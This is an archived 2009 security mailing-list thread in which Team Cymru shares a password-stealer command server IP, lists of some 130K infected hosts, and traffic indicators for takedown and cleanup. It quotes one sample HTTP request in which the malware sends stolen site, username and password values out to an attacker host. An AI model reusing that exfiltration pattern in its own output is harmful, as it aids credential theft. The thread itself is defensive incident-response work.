[nsp-sec] ACK 291: RE: 130K+ Infected Ips on ~3600 ASNs

Kevin Oberman oberman at es.net
Thu Oct 1 14:58:54 EDT 2009 

ACK for AS291.
-- 
R. Kevin Oberman, Network Engineer
Energy Sciences Network (ESnet)
Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
E-mail: oberman at es.net			Phone: +1 510 486-8634
Key fingerprint:059B 2DDF 031C 9BA3 14A4  EADA 927D EBB3 987B 3751

> Date: Thu, 01 Oct 2009 10:47:33 -0700
> From: Stephen Gill <gillsr at cymru.com>
> Sender: nsp-security-bounces at puck.nether.net
> 
> ----------- nsp-security Confidential --------
> 
> Hi Team,
> 
> This password stealer head end IP appears to be quite busy:
> 
> 76.73.37.250
> 
> We're working w/ the ISP on takedown, however in the meantime here is a list
> of 130K+ infected Ips seen talking to it primarily via TCP 80 (reporting
> stolen credentials) and UDP 7006 - UDP 7012.  I don't anticipate an IP
> takedown to last forver because they can likely re-route via DNS.
> 
>     ASN list:
>     https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
> 
>     Infected IP list:
>     https://www.cymru.com/nsp-sec/Owned/stealer/
>     eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
> 
> Timestamps in UTC.
> 
> Some clarification on the formatting:
> 
> 3       | 18.26.4.9        | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS -
> Massachusetts Institute of Technology
> 
> The timestamp column will begin with a U or a T.  U is for UDP, T for TCP.
> When possible we've preferred to list out a T if we have seen any TCP 80
> traffic from the client IP in question.
> 
> It looks like the malware on the client may choose its source IP address
> since we noticed some RFC 1918 traffic so it is possible the UDP data will
> not match in all cases.  I cannot guarantee that the UDP traffic is not part
> of some type of actual software but it sure looks suspicious.  Here is a
> public URL for reference:
> 
>     http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
> 
> As there is UDP involved we cannot guarantee that there are 0 spoofed Ips,
> but on the TCP side that is another matter.
> 
> HTTP credential stealing looks something like this:
> 
> GET 
> /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&
> p=STOLEN_PASSWORD HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible).
> Host: hotshows.org.
> .
> 
> 
> Cheers,
> -- steve
> 
> -- 
> Stephen Gill, Chief Scientist, Team Cymru
> http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
> 
> 
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
>

More information about the nsp-security mailing list